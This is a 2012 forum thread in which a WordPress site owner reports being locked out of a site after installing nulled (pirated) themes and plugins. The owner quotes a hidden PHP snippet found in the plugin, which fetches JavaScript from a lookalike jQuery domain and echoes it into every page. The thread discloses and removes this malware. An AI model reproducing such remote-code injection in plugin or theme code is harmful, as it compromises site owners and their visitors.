1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Hijacked by Nulled theme/plugin?

Discussion in 'Blogging' started by tnoam71, Feb 5, 2012.

  1. tnoam71

    tnoam71 Registered Member

    Joined:
    Jul 27, 2011
    Messages:
    58
    Likes Received:
    33
    Hello everyone,

    I just posted about this in another thread (about cpahits) but figured I'd post here too as it may be more appropriate and increases likelihood of a relevant response.

    I just found something sort of weird, would appreciate if anyone could provide input:

    Right now I tried to visit the admin page of one of my WP sites, but nothing displays. And when I try to visit the site itself, nothing displays.

    And there are scripts running on it from sites that I didn't put there, including vimeo, vimeocdn, gosquared, cloudfront.net, and cpahits.

    Did someone just hack it and lock me out of my own site and WP admin panel?

    I appreciate any help I'm quite confused, never had anything like this happen.

    I should also mention the site is running a nulled version of the WP theme Squeeze Boss (which I got here at BHW) and 'nulled' WP Social Pipes I found elsewhere.

    If anyone has any info or guidance about this I would greatly appreciate and rep and thank and stuff ;D
     
    Last edited: Feb 5, 2012
  2. oxonbeef

    oxonbeef BANNED BANNED

    Joined:
    Jan 4, 2009
    Messages:
    2,242
    Likes Received:
    7,872
    cpahits?
    http://www.blackhatworld.com/blackhat-seo/black-hat-seo-tools/367742-cpahits-com-free-cpa-geo-redirection-service.html

    Sounds like the shit blackhatcodex would pull off. It's about time he's banned from here
    once and for all.
     
  3. tnoam71

    tnoam71 Registered Member

    Joined:
    Jul 27, 2011
    Messages:
    58
    Likes Received:
    33
    Well, it seems the problem was with WP Social Pipes.

    Not sure if I messed up the install somehow (seemed impossible to mess-up). But I deleted it and now I can access the site and admin.

    I went into the php of socialpipes and found in it this code:
    Code:
    <?php if(function_exists('curl_init')) 
    {     
    $url = "h*t*t*p://w*w*w.j-query(dot)org/jquery-1.6.3.min(dot)js";      
    $ch = curl_init();       
    $timeout = 5;       
    curl_setopt($ch,CURLOPT_URL,$url);     
    curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);     curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);      
    $data = curl_exec($ch);       
    curl_close($ch);      
    echo "$data"; } 
    ?>
    and deleted it, then reinstalled. I'm no php maven but I'm keen on seeing SocialPipes work and hope this alteration will correct any issues in the future.



    Please feel free to delete thread since I sort of solved problem.

    However if anyone wants to chime in about what happened here or the potential for a 'nulled' or hacked theme or plugin to hijack a WP (or other) site and what someone can do to prevent or correct this please let the thread stay.

    Such information could help others now and in future.


    Gracias
     
    Last edited: Feb 5, 2012
  4. tnoam71

    tnoam71 Registered Member

    Joined:
    Jul 27, 2011
    Messages:
    58
    Likes Received:
    33
    Whatever happened cpahits was definitely being utilized. I'd never heard of it...

    When I would attempt to load the site my browser would first contact cpahits(dot)com before eventually appearing to download from vimeo and then simply display a blank screen.